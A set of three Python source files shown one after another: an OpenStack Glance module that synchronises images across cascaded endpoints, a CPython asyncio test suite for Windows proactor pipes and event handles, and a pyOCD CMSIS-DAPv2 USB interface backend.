self.watchers.add(watcher)
return watcher
|
base.py
|
# Copyright (c) 2014 OpenStack Foundation.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
# @author: Jia Dong, HuaWei
import copy
import httplib
import Queue
import threading
import time
import eventlet
from oslo.config import cfg
import six.moves.urllib.parse as urlparse
from glance.common import exception
from glance.openstack.common import jsonutils
from glance.openstack.common import timeutils
import glance.openstack.common.log as logging
from glance.sync import utils as s_utils
from glance.sync.clients import Clients as clients
from glance.sync.store.driver import StoreFactory as s_factory
from glance.sync.store.location import LocationFactory as l_factory
import glance.sync.store.glance_store as glance_store
from glance.sync.task import TaskObject
from glance.sync.task import PeriodicTask
LOG = logging.getLogger(__name__)
CONF = cfg.CONF
CONF.import_opt('sync_strategy', 'glance.common.config', group='sync')
CONF.import_opt('task_retry_times', 'glance.common.config', group='sync')
CONF.import_opt('snapshot_timeout', 'glance.common.config', group='sync')
CONF.import_opt('snapshot_sleep_interval', 'glance.common.config',
group='sync')
_IMAGE_LOCS_MAP = {}
def get_copy_location_url(image):
"""
choose a best location of an image for sync.
"""
global _IMAGE_LOCS_MAP
image_id = image.id
locations = image.locations
if not locations:
return ''
#First time store in the cache
if image_id not in _IMAGE_LOCS_MAP.keys():
_IMAGE_LOCS_MAP[image_id] = {
'locations':
[{'url': locations[0]['url'],
'count': 1,
'is_using':1
}]
}
return locations[0]['url']
else:
recorded_locs = _IMAGE_LOCS_MAP[image_id]['locations']
record_urls = [loc['url'] for loc in recorded_locs]
for location in locations:
#the new, not-used location, cache and just return it.
if location['url'] not in record_urls:
recorded_locs.append({
'url': location['url'],
'count':1,
'is_using':1
})
return location['url']
#find ever used and at present not used.
not_used_locs = [loc for loc in recorded_locs
if not loc['is_using']]
if not_used_locs:
_loc = not_used_locs[0]
_loc['is_using'] = 1
_loc['count'] += 1
return _loc['url']
#the last case, just choose one that has the least using count.
_my_loc = sorted(recorded_locs, key=lambda my_loc: my_loc['count'])[0]
_my_loc['count'] += 1
return _my_loc['url']
def remove_invalid_location(id, url):
"""
when sync fail with a location, remove it from the cache.
:param id: the image_id
:param url: the location's url
:return:
"""
global _IMAGE_LOCS_MAP
image_map = _IMAGE_LOCS_MAP[id]
if not image_map:
return
locs = image_map['locations'] or []
if not locs:
return
del_locs = [loc for loc in locs if loc['url'] == url]
if not del_locs:
return
locs.remove(del_locs[0])
def return_sync_location(id, url):
"""
when sync finish, modify the using count and state.
"""
global _IMAGE_LOCS_MAP
image_map = _IMAGE_LOCS_MAP[id]
if not image_map:
return
locs = image_map['locations'] or []
if not locs:
return
selectd_locs = [loc for loc in locs if loc['url'] == url]
if not selectd_locs:
return
selectd_locs[0]['is_using'] = 0
selectd_locs[0]['count'] -= 1
def choose_a_location(sync_f):
"""
the wrapper for the method which need a location for sync.
:param sync_f:
:return:
"""
def wrapper(*args, **kwargs):
_id = args[1]
_auth_token = args[2]
_image = create_self_glance_client(_auth_token).images.get(_id)
_url = get_copy_location_url(_image)
kwargs['src_image_url'] = _url
_sync_ok = False
while not _sync_ok:
try:
sync_f(*args, **kwargs)
_sync_ok = True
except Exception:
remove_invalid_location(_id, _url)
_url = get_copy_location_url(_image)
if not _url:
break
kwargs['src_image_url'] = _url
return wrapper
def get_image_servcie():
return ImageService
def create_glance_client(auth_token, url):
return clients(auth_token).glance(url=url)
def create_self_glance_client(auth_token):
return create_glance_client(auth_token,
s_utils.get_cascading_endpoint_url())
def create_restful_client(auth_token, url):
pieces = urlparse.urlparse(url)
return _create_restful_client(auth_token, pieces.netloc)
def create_self_restful_client(auth_token):
return create_restful_client(auth_token,
s_utils.get_cascading_endpoint_url())
def _create_restful_client(auth_token, url):
server, port = url.split(':')
try:
port = int(port)
except Exception:
port = 9292
conn = httplib.HTTPConnection(server.encode(), port)
image_service = get_image_servcie()
glance_client = image_service(conn, auth_token)
return glance_client
def get_mappings_from_image(auth_token, image_id):
client = create_self_glance_client(auth_token)
image = client.images.get(image_id)
locations = image.locations
if not locations:
return {}
return get_mappings_from_locations(locations)
def get_mappings_from_locations(locations):
mappings = {}
for loc in locations:
if s_utils.is_glance_location(loc['url']):
id = loc['metadata'].get('image_id')
if not id:
continue
ep_url = s_utils.create_ep_by_loc(loc)
mappings[ep_url] = id
# endpoints.append(utils.create_ep_by_loc(loc))
return mappings
class AuthenticationException(Exception):
pass
class ImageAlreadyPresentException(Exception):
pass
class ServerErrorException(Exception):
pass
class UploadException(Exception):
pass
class ImageService(object):
def __init__(self, conn, auth_token):
"""Initialize the ImageService.
conn: a httplib.HTTPConnection to the glance server
auth_token: authentication token to pass in the x-auth-token header
"""
self.auth_token = auth_token
self.conn = conn
def _http_request(self, method, url, headers, body,
ignore_result_body=False):
"""Perform an HTTP request against the server.
method: the HTTP method to use
url: the URL to request (not including server portion)
headers: headers for the request
body: body to send with the request
ignore_result_body: the body of the result will be ignored
Returns: a httplib response object
"""
if self.auth_token:
headers.setdefault('x-auth-token', self.auth_token)
LOG.debug(_('Request: %(method)s http://%(server)s:%(port)s'
'%(url)s with headers %(headers)s')
% {'method': method,
'server': self.conn.host,
'port': self.conn.port,
'url': url,
'headers': repr(headers)})
self.conn.request(method, url, body, headers)
response = self.conn.getresponse()
headers = self._header_list_to_dict(response.getheaders())
code = response.status
code_description = httplib.responses[code]
LOG.debug(_('Response: %(code)s %(status)s %(headers)s')
% {'code': code,
'status': code_description,
'headers': repr(headers)})
if code in [400, 500]:
raise ServerErrorException(response.read())
if code in [401, 403]:
raise AuthenticationException(response.read())
if code == 409:
raise ImageAlreadyPresentException(response.read())
if ignore_result_body:
# NOTE: because we are pipelining requests through a single HTTP
# connection, httplib requires that we read the response body
# before we can make another request. If the caller knows they
# don't care about the body, they can ask us to do that for them.
response.read()
return response
@staticmethod
def _header_list_to_dict(headers):
"""Expand a list of headers into a dictionary.
headers: a list of [(key, value), (key, value), (key, value)]
Returns: a dictionary representation of the list
"""
d = {}
for (header, value) in headers:
if header.startswith('x-image-meta-property-'):
prop = header.replace('x-image-meta-property-', '')
d.setdefault('properties', {})
d['properties'][prop] = value
else:
d[header.replace('x-image-meta-', '')] = value
return d
@staticmethod
def _dict_to_headers(d):
"""Convert a dictionary into one suitable for a HTTP request.
d: a dictionary
Returns: the same dictionary, with x-image-meta added to every key
"""
h = {}
for key in d:
if key == 'properties':
for subkey in d[key]:
if d[key][subkey] is None:
h['x-image-meta-property-%s' % subkey] = ''
else:
h['x-image-meta-property-%s' % subkey] = d[key][subkey]
else:
h['x-image-meta-%s' % key] = d[key]
return h
def add_location(self, image_uuid, path_val, metadata=None):
"""
add an actual location
"""
LOG.debug(_('call restful api to add location: url is %s' % path_val))
metadata = metadata or {}
url = '/v2/images/%s' % image_uuid
hdrs = {'Content-Type': 'application/openstack-images-v2.1-json-patch'}
body = []
value = {'url': path_val, 'metadata': metadata}
body.append({'op': 'add', 'path': '/locations/-', 'value': value})
return self._http_request('PATCH', url, hdrs, jsonutils.dumps(body))
def clear_locations(self, image_uuid):
"""
clear all the location infos, make the image status be 'queued'.
"""
LOG.debug(_('call restful api to clear image location: image id is %s'
% image_uuid))
url = '/v2/images/%s' % image_uuid
hdrs = {'Content-Type': 'application/openstack-images-v2.1-json-patch'}
body = []
body.append({'op': 'replace', 'path': '/locations', 'value': []})
return self._http_request('PATCH', url, hdrs, jsonutils.dumps(body))
class MetadataHelper(object):
def execute(self, auth_token, endpoint, action_name='CREATE',
image_id=None, **kwargs):
glance_client = create_glance_client(auth_token, endpoint)
if action_name.upper() == 'CREATE':
return self._do_create_action(glance_client, **kwargs)
if action_name.upper() == 'SAVE':
return self._do_save_action(glance_client, image_id, **kwargs)
if action_name.upper() == 'DELETE':
return self._do_delete_action(glance_client, image_id, **kwargs)
return None
@staticmethod
def _fetch_params(keys, **kwargs):
return tuple([kwargs.get(key, None) for key in keys])
def _do_create_action(self, glance_client, **kwargs):
body = kwargs['body']
new_image = glance_client.images.create(**body)
return new_image.id
def _do_save_action(self, glance_client, image_id, **kwargs):
keys = ['changes', 'removes', 'tags']
changes, removes, tags = self._fetch_params(keys, **kwargs)
if changes or removes:
glance_client.images.update(image_id,
remove_props=removes,
**changes)
if tags:
if tags.get('add', None):
added = tags.get('add')
for tag in added:
glance_client.image_tags.update(image_id, tag)
elif tags.get('delete', None):
removed = tags.get('delete')
for tag in removed:
glance_client.image_tags.delete(image_id, tag)
return glance_client.images.get(image_id)
def _do_delete_action(self, glance_client, image_id, **kwargs):
return glance_client.images.delete(image_id)
_task_queue = Queue.Queue(maxsize=150)
class SyncManagerV2():
MAX_TASK_RETRY_TIMES = 1
def __init__(self):
global _task_queue
self.mete_helper = MetadataHelper()
self.location_factory = l_factory()
self.store_factory = s_factory()
self.task_queue = _task_queue
self.task_handler = None
self.unhandle_task_list = []
self.periodic_add_id_list = []
self.periodic_add_done = True
self._load_glance_store_cfg()
self.ks_client = clients().keystone()
self.create_new_periodic_task = False
def _load_glance_store_cfg(self):
glance_store.setup_glance_stores()
def sync_image_metadata(self, image_id, auth_token, action, **kwargs):
if not action or CONF.sync.sync_strategy == 'None':
return
kwargs['image_id'] = image_id
if action == 'SAVE':
self.task_queue.put_nowait(TaskObject.get_instance('meta_update',
kwargs))
elif action == 'DELETE':
self.task_queue.put_nowait(TaskObject.get_instance('meta_remove',
kwargs))
@choose_a_location
def sync_image_data(self, image_id, auth_token, eps=None, **kwargs):
if CONF.sync.sync_strategy in ['None', 'nova']:
return
kwargs['image_id'] = image_id
cascading_ep = s_utils.get_cascading_endpoint_url()
kwargs['cascading_ep'] = cascading_ep
copy_url = kwargs.get('src_image_url', None)
if not copy_url:
LOG.warn(_('No copy url found, for image %s sync, Exit.'),
image_id)
return
LOG.info(_('choose the copy url %s for sync image %s'),
copy_url, image_id)
if s_utils.is_glance_location(copy_url):
kwargs['copy_ep'] = s_utils.create_ep_by_loc_url(copy_url)
kwargs['copy_id'] = s_utils.get_id_from_glance_loc_url(copy_url)
else:
kwargs['copy_ep'] = cascading_ep
kwargs['copy_id'] = image_id
self.task_queue.put_nowait(TaskObject.get_instance('sync', kwargs))
def adding_locations(self, image_id, auth_token, locs, **kwargs):
if CONF.sync.sync_strategy == 'None':
return
for loc in locs:
if s_utils.is_glance_location(loc['url']):
if s_utils.is_snapshot_location(loc):
snapshot_ep = s_utils.create_ep_by_loc(loc)
snapshot_id = s_utils.get_id_from_glance_loc(loc)
snapshot_client = create_glance_client(auth_token,
snapshot_ep)
snapshot_image = snapshot_client.images.get(snapshot_id)
_pre_check_time = timeutils.utcnow()
_timout = CONF.sync.snapshot_timeout
while not timeutils.is_older_than(_pre_check_time,
_timout):
if snapshot_image.status == 'active':
break
LOG.debug(_('Check snapshot not active, wait for %i'
'second.'
% CONF.sync.snapshot_sleep_interval))
time.sleep(CONF.sync.snapshot_sleep_interval)
snapshot_image = snapshot_client.images.get(
snapshot_id)
if snapshot_image.status != 'active':
LOG.error(_('Snapshot status to active Timeout'))
return
kwargs['image_id'] = image_id
kwargs['snapshot_ep'] = snapshot_ep
kwargs['snapshot_id'] = snapshot_id
snapshot_task = TaskObject.get_instance('snapshot', kwargs)
self.task_queue.put_nowait(snapshot_task)
else:
LOG.debug(_('patch a normal location %s to image %s'
% (loc['url'], image_id)))
input = {'image_id': image_id, 'location': loc}
self.task_queue.put_nowait(TaskObject.get_instance('patch',
input))
def removing_locations(self, image_id, auth_token, locs):
if CONF.sync.sync_strategy == 'None':
return
locs = filter(lambda loc: s_utils.is_glance_location(loc['url']), locs)
if not locs:
return
input = {'image_id': image_id, 'locations': locs}
remove_locs_task = TaskObject.get_instance('locs_remove', input)
self.task_queue.put_nowait(remove_locs_task)
def clear_all_locations(self, image_id, auth_token, locs):
locs = filter(lambda loc: not s_utils.is_snapshot_location(loc), locs)
self.removing_locations(image_id, auth_token, locs)
def create_new_cascaded_task(self, last_run_time=None):
LOG.debug(_('new_cascaded periodic task has been created.'))
glance_client = create_self_glance_client(self.ks_client.auth_token)
filters = {'status': 'active'}
image_list = glance_client.images.list(filters=filters)
input = {}
run_images = {}
cascading_ep = s_utils.get_cascading_endpoint_url()
input['cascading_ep'] = cascading_ep
input['image_id'] = 'ffffffff-ffff-ffff-ffff-ffffffffffff'
all_ep_urls = s_utils.get_endpoints()
for image in image_list:
glance_urls = [loc['url'] for loc in image.locations
if s_utils.is_glance_location(loc['url'])]
lack_ep_urls = s_utils.calculate_lack_endpoints(all_ep_urls,
glance_urls)
if lack_ep_urls:
image_core_props = s_utils.get_core_properties(image)
run_images[image.id] = {'body': image_core_props,
'locations': lack_ep_urls}
if not run_images:
LOG.debug(_('No images need to sync to new cascaded glances.'))
input['images'] = run_images
return TaskObject.get_instance('periodic_add', input,
last_run_time=last_run_time)
@staticmethod
def _fetch_params(keys, **kwargs):
return tuple([kwargs.get(key, None) for key in keys])
def _get_candidate_path(self, auth_token, from_ep, image_id,
scheme='file'):
g_client = create_glance_client(auth_token, from_ep)
image = g_client.images.get(image_id)
locs = image.locations or []
for loc in locs:
if s_utils.is_glance_location(loc['url']):
continue
if loc['url'].startswith(scheme):
if scheme == 'file':
return loc['url'][len('file://'):]
return loc['url']
return None
def _do_image_data_copy(self, s_ep, d_ep, from_image_id, to_image_id,
candidate_path=None):
from_scheme, to_scheme = glance_store.choose_best_store_schemes(s_ep,
d_ep)
store_driver = self.store_factory.get_instance(from_scheme['name'],
to_scheme['name'])
from_params = from_scheme['parameters']
from_params['image_id'] = from_image_id
to_params = to_scheme['parameters']
to_params['image_id'] = to_image_id
from_location = self.location_factory.get_instance(from_scheme['name'],
**from_params)
to_location = self.location_factory.get_instance(to_scheme['name'],
**to_params)
return store_driver.copy_to(from_location, to_location,
candidate_path=candidate_path)
def _patch_cascaded_location(self, auth_token, image_id,
cascaded_ep, cascaded_id, action=None):
self_restful_client = create_self_restful_client(auth_token)
path = s_utils.generate_glance_location(cascaded_ep, cascaded_id)
# add the auth_token, so this url can be visited, otherwise 404 error
path += '?auth_token=1'
metadata = {'image_id': cascaded_id}
if action:
metadata['action'] = action
self_restful_client.add_location(image_id, path, metadata)
def meta_update(self, auth_token, cascaded_ep, image_id, **kwargs):
return self.mete_helper.execute(auth_token, cascaded_ep, 'SAVE',
image_id, **kwargs)
def meta_delete(self, auth_token, cascaded_ep, image_id):
return self.mete_helper.execute(auth_token, cascaded_ep, 'DELETE',
image_id)
def sync_image(self, auth_token, copy_ep=None, to_ep=None,
copy_image_id=None, cascading_image_id=None, **kwargs):
# Firstly, crate an image object with cascading image's properties.
LOG.debug(_('create an image metadata in ep: %s'), to_ep)
cascaded_id = self.mete_helper.execute(auth_token, to_ep,
**kwargs)
try:
c_path = self._get_candidate_path(auth_token, copy_ep,
copy_image_id)
LOG.debug(_('Chose candidate path: %s from ep %s'), c_path, copy_ep)
# execute copy operation to copy the image data.
copy_image_loc = self._do_image_data_copy(copy_ep,
to_ep,
copy_image_id,
cascaded_id,
candidate_path=c_path)
LOG.debug(_('Sync image data, synced loc is %s'), copy_image_loc)
# patch the copied image_data to the image
glance_client = create_restful_client(auth_token, to_ep)
glance_client.add_location(cascaded_id, copy_image_loc)
# patch the glance location to cascading glance
msg = _("patch glance location to cascading image, with cascaded "
"endpoint : %s, cascaded id: %s, cascading image id: %s." %
(to_ep, cascaded_id, cascading_image_id))
LOG.debug(msg)
self._patch_cascaded_location(auth_token,
cascading_image_id,
to_ep,
cascaded_id,
action='upload')
return cascaded_id
except exception.SyncStoreCopyError as e:
LOG.error(_("Exception occurs when syncing store copy."))
raise exception.SyncServiceOperationError(reason=e.msg)
def do_snapshot(self, auth_token, snapshot_ep, cascaded_ep,
snapshot_image_id, cascading_image_id, **kwargs):
return self.sync_image(auth_token, copy_ep=snapshot_ep,
to_ep=cascaded_ep, copy_image_id=snapshot_image_id,
cascading_image_id=cascading_image_id, **kwargs)
def patch_location(self, image_id, cascaded_id, auth_token, cascaded_ep,
location):
g_client = create_glance_client(auth_token, cascaded_ep)
cascaded_image = g_client.images.get(cascaded_id)
glance_client = create_restful_client(auth_token, cascaded_ep)
try:
glance_client.add_location(cascaded_id, location['url'])
if cascaded_image.status == 'queued':
self._patch_cascaded_location(auth_token,
image_id,
cascaded_ep,
cascaded_id,
action='patch')
except:
pass
def remove_loc(self, cascaded_id, auth_token, cascaded_ep):
glance_client = create_glance_client(auth_token, cascaded_ep)
glance_client.images.delete(cascaded_id)
def start(self):
# lanuch a new thread to read the task_task to handle.
_thread = threading.Thread(target=self.tasks_handle)
_thread.setDaemon(True)
_thread.start()
def tasks_handle(self):
while True:
_task = self.task_queue.get()
if not isinstance(_task, TaskObject):
LOG.error(_('task type valid.'))
continue
LOG.debug(_('Task start to runs, task id is %s' % _task.id))
_task.start_time = timeutils.strtime()
self.unhandle_task_list.append(copy.deepcopy(_task))
eventlet.spawn(_task.execute, self, self.ks_client.auth_token)
def handle_tasks(self, task_result):
t_image_id = task_result.get('image_id')
t_type = task_result.get('type')
t_start_time = task_result.get('start_time')
t_status = task_result.get('status')
handling_tasks = filter(lambda t: t.image_id == t_image_id and
t.start_time == t_start_time,
self.unhandle_task_list)
if not handling_tasks or len(handling_tasks) > 1:
LOG.error(_('The task not exist or duplicate, can not go handle. '
'Info is image: %(id)s, op_type: %(type)s, run time: '
'%(time)s'
% {'id': t_image_id,
'type': t_type,
'time': t_start_time}
))
return
task = handling_tasks[0]
self.unhandle_task_list.remove(task)
if isinstance(task, PeriodicTask):
LOG.debug(_('The periodic task executed done, with op %(type)s '
'runs at time: %(start_time)s, the status is '
'%(status)s.' %
{'type': t_type,
'start_time': t_start_time,
'status': t_status
}))
else:
if t_status == 'terminal':
LOG.debug(_('The task executed successful for image:'
'%(image_id)s with op %(type)s, which runs '
'at time: %(start_time)s' %
{'image_id': t_image_id,
'type': t_type,
'start_time': t_start_time
}))
elif t_status == 'param_error':
LOG.error(_('The task executed failed for params error. Image:'
'%(image_id)s with op %(type)s, which runs '
'at time: %(start_time)s' %
{'image_id': t_image_id,
'type': t_type,
'start_time': t_start_time
}))
elif t_status == 'error':
LOG.error(_('The task failed to execute. Detail info is: '
'%(image_id)s with op %(op_type)s run_time:'
'%(start_time)s' %
{'image_id': t_image_id,
'op_type': t_type,
'start_time': t_start_time
}))
|
test_windows_events.py
|
import os
import signal
import socket
import sys
import time
import threading
import unittest
from unittest import mock
if sys.platform != 'win32':
raise unittest.SkipTest('Windows only')
import _overlapped
import _winapi
import asyncio
from asyncio import windows_events
from asyncio.streams import _StreamProtocol
from test.test_asyncio import utils as test_utils
def tearDownModule():
asyncio.set_event_loop_policy(None)
class UpperProto(asyncio.Protocol):
def __init__(self):
self.buf = []
def connection_made(self, trans):
self.trans = trans
def data_received(self, data):
self.buf.append(data)
if b'\n' in data:
self.trans.write(b''.join(self.buf).upper())
self.trans.close()
class ProactorLoopCtrlC(test_utils.TestCase):
def test_ctrl_c(self):
def SIGINT_after_delay():
time.sleep(0.1)
signal.raise_signal(signal.SIGINT)
thread = threading.Thread(target=SIGINT_after_delay)
loop = asyncio.get_event_loop()
try:
# only start the loop once the event loop is running
loop.call_soon(thread.start)
loop.run_forever()
self.fail("should not fall through 'run_forever'")
except KeyboardInterrupt:
pass
finally:
self.close_loop(loop)
thread.join()
class ProactorMultithreading(test_utils.TestCase):
def test_run_from_nonmain_thread(self):
finished = False
async def coro():
await asyncio.sleep(0)
def func():
nonlocal finished
loop = asyncio.new_event_loop()
loop.run_until_complete(coro())
finished = True
thread = threading.Thread(target=func)
thread.start()
thread.join()
self.assertTrue(finished)
class ProactorTests(test_utils.TestCase):
def setUp(self):
super().setUp()
self.loop = asyncio.ProactorEventLoop()
self.set_event_loop(self.loop)
def test_close(self):
a, b = socket.socketpair()
trans = self.loop._make_socket_transport(a, asyncio.Protocol())
f = asyncio.ensure_future(self.loop.sock_recv(b, 100), loop=self.loop)
trans.close()
self.loop.run_until_complete(f)
self.assertEqual(f.result(), b'')
b.close()
def test_double_bind(self):
ADDRESS = r'\\.\pipe\test_double_bind-%s' % os.getpid()
server1 = windows_events.PipeServer(ADDRESS)
with self.assertRaises(PermissionError):
windows_events.PipeServer(ADDRESS)
server1.close()
def test_pipe(self):
res = self.loop.run_until_complete(self._test_pipe())
self.assertEqual(res, 'done')
async def _test_pipe(self):
ADDRESS = r'\\.\pipe\_test_pipe-%s' % os.getpid()
with self.assertRaises(FileNotFoundError):
await self.loop.create_pipe_connection(
asyncio.Protocol, ADDRESS)
[server] = await self.loop.start_serving_pipe(
UpperProto, ADDRESS)
self.assertIsInstance(server, windows_events.PipeServer)
clients = []
for i in range(5):
stream = asyncio.Stream(mode=asyncio.StreamMode.READ,
loop=self.loop, _asyncio_internal=True)
protocol = _StreamProtocol(stream,
loop=self.loop,
_asyncio_internal=True)
trans, proto = await self.loop.create_pipe_connection(
lambda: protocol, ADDRESS)
self.assertIsInstance(trans, asyncio.Transport)
self.assertEqual(protocol, proto)
clients.append((stream, trans))
for i, (r, w) in enumerate(clients):
w.write('lower-{}\n'.format(i).encode())
for i, (r, w) in enumerate(clients):
response = await r.readline()
self.assertEqual(response, 'LOWER-{}\n'.format(i).encode())
w.close()
await r.close()
server.close()
with self.assertRaises(FileNotFoundError):
await self.loop.create_pipe_connection(
asyncio.Protocol, ADDRESS)
return 'done'
def test_connect_pipe_cancel(self):
exc = OSError()
exc.winerror = _overlapped.ERROR_PIPE_BUSY
with mock.patch.object(_overlapped, 'ConnectPipe',
side_effect=exc) as connect:
coro = self.loop._proactor.connect_pipe('pipe_address')
task = self.loop.create_task(coro)
# check that it's possible to cancel connect_pipe()
task.cancel()
with self.assertRaises(asyncio.CancelledError):
self.loop.run_until_complete(task)
def test_wait_for_handle(self):
event = _overlapped.CreateEvent(None, True, False, None)
self.addCleanup(_winapi.CloseHandle, event)
# Wait for unset event with 0.5s timeout;
# result should be False at timeout
fut = self.loop._proactor.wait_for_handle(event, 0.5)
start = self.loop.time()
done = self.loop.run_until_complete(fut)
elapsed = self.loop.time() - start
self.assertEqual(done, False)
self.assertFalse(fut.result())
# bpo-31008: Tolerate only 450 ms (at least 500 ms expected),
# because of bad clock resolution on Windows
self.assertTrue(0.45 <= elapsed <= 0.9, elapsed)
_overlapped.SetEvent(event)
# Wait for set event;
# result should be True immediately
fut = self.loop._proactor.wait_for_handle(event, 10)
start = self.loop.time()
done = self.loop.run_until_complete(fut)
elapsed = self.loop.time() - start
self.assertEqual(done, True)
self.assertTrue(fut.result())
self.assertTrue(0 <= elapsed < 0.3, elapsed)
# asyncio issue #195: cancelling a done _WaitHandleFuture
# must not crash
fut.cancel()
def test_wait_for_handle_cancel(self):
event = _overlapped.CreateEvent(None, True, False, None)
self.addCleanup(_winapi.CloseHandle, event)
# Wait for unset event with a cancelled future;
# CancelledError should be raised immediately
fut = self.loop._proactor.wait_for_handle(event, 10)
fut.cancel()
start = self.loop.time()
with self.assertRaises(asyncio.CancelledError):
self.loop.run_until_complete(fut)
elapsed = self.loop.time() - start
self.assertTrue(0 <= elapsed < 0.1, elapsed)
# asyncio issue #195: cancelling a _WaitHandleFuture twice
# must not crash
fut = self.loop._proactor.wait_for_handle(event)
fut.cancel()
fut.cancel()
class WinPolicyTests(test_utils.TestCase):
def test_selector_win_policy(self):
async def main():
self.assertIsInstance(
asyncio.get_running_loop(),
asyncio.SelectorEventLoop)
old_policy = asyncio.get_event_loop_policy()
try:
asyncio.set_event_loop_policy(
asyncio.WindowsSelectorEventLoopPolicy())
asyncio.run(main())
finally:
asyncio.set_event_loop_policy(old_policy)
def test_proactor_win_policy(self):
async def main():
self.assertIsInstance(
asyncio.get_running_loop(),
asyncio.ProactorEventLoop)
old_policy = asyncio.get_event_loop_policy()
try:
asyncio.set_event_loop_policy(
asyncio.WindowsProactorEventLoopPolicy())
asyncio.run(main())
finally:
asyncio.set_event_loop_policy(old_policy)
if __name__ == '__main__':
unittest.main()
|
pyusb_v2_backend.py
|
# pyOCD debugger
# Copyright (c) 2019 Arm Limited
# SPDX-License-Identifier: Apache-2.0
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from .interface import Interface
from .common import (filter_device_by_class, is_known_cmsis_dap_vid_pid)
from ..dap_access_api import DAPAccessIntf
from ... import common
import logging
import os
import threading
import six
from time import sleep
import errno
import platform
LOG = logging.getLogger(__name__)
try:
import usb.core
import usb.util
except:
IS_AVAILABLE = False
else:
IS_AVAILABLE = True
class PyUSBv2(Interface):
"""!
@brief CMSIS-DAPv2 interface using pyUSB.
"""
isAvailable = IS_AVAILABLE
def __init__(self):
super(PyUSBv2, self).__init__()
self.ep_out = None
self.ep_in = None
self.ep_swo = None
self.dev = None
self.intf_number = None
self.serial_number = None
self.kernel_driver_was_attached = False
self.closed = True
self.thread = None
self.rx_stop_event = None
self.swo_thread = None
self.swo_stop_event = None
self.rcv_data = []
self.swo_data = []
self.read_sem = threading.Semaphore(0)
self.packet_size = 512
self.is_swo_running = False
@property
def has_swo_ep(self):
return self.ep_swo is not None
def open(self):
assert self.closed is True
# Get device handle
dev = usb.core.find(custom_match=HasCmsisDapv2Interface(self.serial_number))
if dev is None:
raise DAPAccessIntf.DeviceError("Device %s not found" %
self.serial_number)
# get active config
config = dev.get_active_configuration()
# Get CMSIS-DAPv2 interface
interface = usb.util.find_descriptor(config, custom_match=match_cmsis_dap_interface_name)
if interface is None:
raise DAPAccessIntf.DeviceError("Device %s has no CMSIS-DAPv2 interface" %
self.serial_number)
interface_number = interface.bInterfaceNumber
# Find endpoints. CMSIS-DAPv2 endpoints are in a fixed order.
try:
ep_out = interface.endpoints()[0]
ep_in = interface.endpoints()[1]
ep_swo = interface.endpoints()[2] if len(interface.endpoints()) > 2 else None
except IndexError:
raise DAPAccessIntf.DeviceError("CMSIS-DAPv2 device %s is missing endpoints" %
self.serial_number)
# Explicitly claim the interface
try:
usb.util.claim_interface(dev, interface_number)
except usb.core.USBError as exc:
raise six.raise_from(DAPAccessIntf.DeviceError("Unable to open device"), exc)
# Update all class variables if we made it here
self.ep_out = ep_out
self.ep_in = ep_in
self.ep_swo = ep_swo
self.dev = dev
self.intf_number = interface_number
# Start RX thread as the last step
self.closed = False
self.start_rx()
def start_rx(self):
# Flush the RX buffers by reading until timeout exception
try:
while True:
self.ep_in.read(self.ep_in.wMaxPacketSize, 1)
except usb.core.USBError:
# USB timeout expected
pass
# Start RX thread
self.rx_stop_event = threading.Event()
thread_name = "CMSIS-DAP receive (%s)" % self.serial_number
self.thread = threading.Thread(target=self.rx_task, name=thread_name)
self.thread.daemon = True
self.thread.start()
def start_swo(self):
self.swo_stop_event = threading.Event()
thread_name = "SWO receive (%s)" % self.serial_number
self.swo_thread = threading.Thread(target=self.swo_rx_task, name=thread_name)
self.swo_thread.daemon = True
self.swo_thread.start()
self.is_swo_running = True
def stop_swo(self):
self.swo_stop_event.set()
self.swo_thread.join()
self.swo_thread = None
self.swo_stop_event = None
self.is_swo_running = False
def rx_task(self):
try:
while not self.rx_stop_event.is_set():
self.read_sem.acquire()
if not self.rx_stop_event.is_set():
self.rcv_data.append(self.ep_in.read(self.ep_in.wMaxPacketSize, 10 * 1000))
finally:
# Set last element of rcv_data to None on exit
self.rcv_data.append(None)
def swo_rx_task(self):
try:
while not self.swo_stop_event.is_set():
try:
self.swo_data.append(self.ep_swo.read(self.ep_swo.wMaxPacketSize, 10 * 1000))
except usb.core.USBError:
pass
finally:
# Set last element of swo_data to None on exit
self.swo_data.append(None)
@staticmethod
def get_all_connected_interfaces():
"""! @brief Returns all the connected devices with a CMSIS-DAPv2 interface."""
# find all cmsis-dap devices
try:
all_devices = usb.core.find(find_all=True, custom_match=HasCmsisDapv2Interface())
except usb.core.NoBackendError:
common.show_no_libusb_warning()
return []
# iterate on all devices found
boards = []
for board in all_devices:
new_board = PyUSBv2()
new_board.vid = board.idVendor
new_board.pid = board.idProduct
new_board.product_name = board.product
new_board.vendor_name = board.manufacturer
new_board.serial_number = board.serial_number
boards.append(new_board)
return boards
def write(self, data):
"""! @brief Write data on the OUT endpoint."""
report_size = self.packet_size
if self.ep_out:
report_size = self.ep_out.wMaxPacketSize
for _ in range(report_size - len(data)):
data.append(0)
self.read_sem.release()
self.ep_out.write(data)
#logging.debug('sent: %s', data)
def read(self):
"""! @brief Read data on the IN endpoint."""
while len(self.rcv_data) == 0:
sleep(0)
if self.rcv_data[0] is None:
raise DAPAccessIntf.DeviceError("Device %s read thread exited unexpectedly" % self.serial_number)
return self.rcv_data.pop(0)
def read_swo(self):
# Accumulate all available SWO data.
data = bytearray()
while len(self.swo_data):
if self.swo_data[0] is None:
raise DAPAccessIntf.DeviceError("Device %s SWO thread exited unexpectedly" % self.serial_number)
data += self.swo_data.pop(0)
return data
def set_packet_count(self, count):
# No interface level restrictions on count
self.packet_count = count
def set_packet_size(self, size):
self.packet_size = size
def get_serial_number(self):
return self.serial_number
def close(self):
"""! @brief Close the USB interface."""
assert self.closed is False
if self.is_swo_running:
self.stop_swo()
self.closed = True
self.rx_stop_event.set()
self.read_sem.release()
self.thread.join()
assert self.rcv_data[-1] is None
self.rcv_data = []
self.swo_data = []
